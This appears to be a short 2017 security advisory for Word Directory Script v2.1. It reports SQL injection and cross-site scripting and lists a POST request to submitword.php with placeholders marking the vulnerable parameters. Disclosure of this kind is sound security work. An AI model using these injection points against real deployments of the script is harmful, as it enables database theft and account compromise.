Word Directory Script 2.1 Cross Site Scripting / SQL Injection

Published
Credit
Risk
2017.04.15
Bilal KARDADOU
Medium
CWE
CVE
Local
Remote
CWE-89
CWE-79
N/A
No
Yes

################################################
#Title: Word Directory Script v 2.1 - Cross Site Scripting / SQL Injection
#Credit: Bilal KARDADOU
#Vendor: http://www.phponly.com/
#Vendor URL: http://www.phponly.com/words.html
#Product: Word Directory Script v 2.1
#Google Dork: N/A
################################################
#
# Product & Service Introduction:
#
# "Word Directory Script"
# The big difference between this directory and the others,
# is that this one has a user statistic where users can login and see how
many hits their words have received.
# This word directory offers you better features than any other.
# Listings cannot be submitted until payment has been received.
#
# [POST/\Method]
http://localhost/words/submitword.php
# Data: name=[SQL]Tebi&client_mail=demo%40demo.com[SQL]&url=http%3A%2F%
2Fwww.google.com
[SQL]&word=tebi&size=15[SQL]&is_bold=1&color=%230000FF&title=aaaaaa[SQL]&terms_accepted=1&buyword=
#
# PoC:
# http://prntscr.com/evwcwr
# http://prntscr.com/evwejp
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com